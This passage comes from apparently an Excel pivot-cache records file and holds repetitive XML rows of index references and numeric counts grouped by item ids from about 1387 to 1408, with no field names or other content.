    <x v="2"/>
    <x v="10"/>
    <n v="16"/>
    <x v="1387"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="69"/>
    <x v="1387"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="1387"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1387"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1388"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1388"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1388"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1388"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1388"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1388"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1388"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1388"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1388"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1388"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="13"/>
    <x v="1388"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="12"/>
    <x v="1388"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="1"/>
    <x v="1388"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1388"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1389"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1389"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1389"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1389"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1389"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1389"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="1389"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="1389"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1389"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1389"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1389"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1389"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1389"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1389"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1390"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1390"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1390"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1390"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1390"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1390"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="1390"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1390"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1390"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1390"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="1390"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1390"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1390"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1390"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1391"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1391"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1391"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1391"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="6"/>
    <x v="1391"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1391"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1391"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1391"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="4"/>
    <x v="1391"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="3"/>
    <x v="1391"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="149"/>
    <x v="1391"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="111"/>
    <x v="1391"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1391"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1391"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1392"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1392"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1392"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1392"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1392"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1392"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1392"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1392"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1392"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1392"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="1392"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="1392"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1392"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1392"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1393"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1393"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1393"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1393"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1393"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1393"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1393"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1393"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="5"/>
    <x v="1393"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="10"/>
    <x v="1393"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="67"/>
    <x v="1393"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="146"/>
    <x v="1393"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1393"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1393"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1394"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1394"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1394"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1394"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1394"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1394"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1394"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="1394"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1394"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1394"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1394"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1394"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="15"/>
    <x v="1394"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1394"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1395"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1395"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1395"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1395"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1395"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1395"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1395"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1395"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1395"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1395"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="26"/>
    <x v="1395"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="1395"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1395"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1395"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1396"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1396"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1396"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1396"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1396"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1396"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="6"/>
    <x v="1396"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="1396"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1396"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="5"/>
    <x v="1396"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="1396"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="51"/>
    <x v="1396"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1396"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1396"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1396"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1397"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1397"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1397"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1397"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1397"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1397"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1397"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1397"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1397"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1397"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="1397"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="1397"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="22"/>
    <x v="1397"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1397"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1398"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1398"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1398"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1398"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1398"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1398"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1398"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1398"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1398"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1398"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1398"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1398"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1398"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1398"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1399"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1399"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1399"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1399"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1399"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1399"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="56"/>
    <x v="1399"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="51"/>
    <x v="1399"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1399"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1399"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="845"/>
    <x v="1399"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1626"/>
    <x v="1399"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1399"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1399"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1400"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1400"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1400"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1400"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1400"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1400"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="8"/>
    <x v="1400"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1400"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1400"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1400"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1400"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1400"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1400"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1400"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="1269"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="20"/>
    <x v="1269"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1401"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1401"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1401"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1401"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1401"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1401"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1401"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1401"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1401"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1401"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="22"/>
    <x v="1401"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="1401"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1401"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1401"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1402"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1402"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1402"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1402"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1402"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1402"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1402"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1402"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1402"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1402"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="6"/>
    <x v="1402"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1402"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1402"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1402"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1358"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1403"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1403"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1403"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1403"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1403"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1403"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1403"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1403"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1403"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1403"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="1403"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="1403"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1403"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1403"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1404"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1404"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1404"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1404"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1404"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1404"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1404"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1404"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1404"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1404"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1404"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="11"/>
    <x v="1404"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1404"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1404"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1405"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1405"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1405"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1405"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1405"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1405"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1405"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1405"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1405"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1405"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="9"/>
    <x v="1405"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1405"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1405"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1405"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1406"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1406"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1406"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1406"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="1406"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1406"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="20"/>
    <x v="1406"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="30"/>
    <x v="1406"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1406"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1406"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="1406"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="10"/>
    <x v="1406"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1406"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1406"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1406"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1407"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1407"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="1"/>
    <x v="1407"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1407"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="1407"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1407"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1407"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1407"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="2"/>
    <x v="1407"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="4"/>
    <x v="1407"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1407"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="4"/>
    <x v="1407"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="5"/>
    <x v="1407"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="5"/>
    <x v="1407"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1408"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1408"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1408"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1408"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1408"/>
  </r>
  <r>
